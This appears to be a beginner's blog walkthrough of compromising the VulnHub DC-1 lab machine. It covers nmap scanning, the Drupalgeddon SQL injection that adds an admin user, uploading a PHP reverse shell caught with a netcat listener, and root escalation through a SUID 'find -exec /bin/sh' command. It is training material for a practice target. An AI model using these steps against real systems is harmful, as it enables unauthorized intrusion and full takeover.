VulnHub is a fantastic starting point for those who are beginners to pentesting. All the machines that we’ll be hacking into are available as
.ova downloads on VulnHub. I usually always import them into VMware Workstation, just because I’m more comfortable with Workstation than VirtualBox. Also, I’ll be using Kali Linux as my attacking machine.
The vulnerable machine that we’ll be using in this article is available here.
Note: The methodologies and tools that you learn from pentesting have real world applications. Do not attempt to try and hack into machines you’re not authorized to. I will not be held responsible for your actions.
Finding IP Address of DC-1
After powering up the machine in Workstation, the first step is to determine its IP address. We’ll need the IP address for all communications with DC-1. My personal choice is
So, the IP address of DC-1 is
192.168.248.144. Let’s modify our
/etc/hosts file on Kali to reflect this.
Now that we know the IP address of DC-1, we’ll scan it more deeply to get more information out of it. I have written a port scan bash script which is basically two nmap scans. The first scan determines open ports and the second scan uses the
-A flag on those ports.
nmap scan, we can note the following:
OpenSSH 6.0p1 Debian 4+deb7u7, Apache httpd 2.2.22, Drupal 7
OpenSSH 6.0p1 was released on
2012-04-22, which is quite old so there might be vulnerabilities in it. However, we have more interesting and possibly easy entry options through port
80, so let’s go for that route first.
80 served a Drupal login form
nmap scan, we know the
robots.txt file contains many entries, so let’s look into that.
It looks like the interesting pages like
/cron.php are behind the login page that we saw.
For now, I don’t see any point in running
dirbuster or other website directory enumeration tools since
robots.txt gave us information about it.
Let’s see if
searchsploit gives us any interesting
Drupal 7 exploits that we can use to log into the web application.
Let’s look at
'Drupalgeddon' SQL Injection (Add Admin User).
Looks like it was a success! We’re now logged into the web application as a
Drupal 7 admin user. Our next aim is to find a location where we can upload a shell script.
Initial Access – Shell Upload and Execute
I found an article through Google-fu which outlines how to upload a shell on
Drupal 7. Besides the steps in the article, there’s one additional step in our situation – to allow permissions for all users on the
PHP filter module.
Once that is done, you’ll have a page like the following:
Upload a simple
PHP reverse shell. Remember to change the IP address to your Kali’s IP. You can also change the port number if you feel like doing so.
Start a netcat listener on Kali:
sudo nc -nlvp 443 and execute the shell from the browser (or even
Nice! We now have a low privilege
www-data user shell. Our next step would be to find a way to escalate privileges to another user or even
root if possible.
In the raw shell that we receive on our netcat listener, you’ll notice that there is no auto-complete feature, command history, etc. But we can get all of those nice things! Follow these steps:
Let’s find all programs which have the SUID bit set. I search for them specifically because when they are executed, they run with the privileges of their owner. If the owner is
root and the program itself is vulnerable, we have a chance of escalating our privileges to
Focus on the
find allows you to execute commands. In this case, it has the SUID bit set and it will run with
root privileges. Nice! Let’s head off to GTFOBins to find how to exploit this weakness.
So, the command that will (hopefully) give us
root shell is
/usr/bin/find . -exec /bin/sh \; -quit. I omitted the
-p flag because DC-1 is a
Debian machine (verify with
uname -a command).
Nice! We have
root shell and we have successfully compromised the DC-1 machine!
Thank you for reading!
In this article, I gave you a small glimpse into the pentesting world. The methodology that we used in this article was very simple. We got a login form; got an exploit to get in; easily uploaded a shell; easily escalated privileges. This was a very simple machine to crack, even though you may not feel so at this point and that’s okay! You’re learning and I feel your pain!
Things will start getting spicy in the coming weeks, so hold on tight! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!
Feature image credit: https://www.360logica.com/blog/different-methodologies-penetration-testing/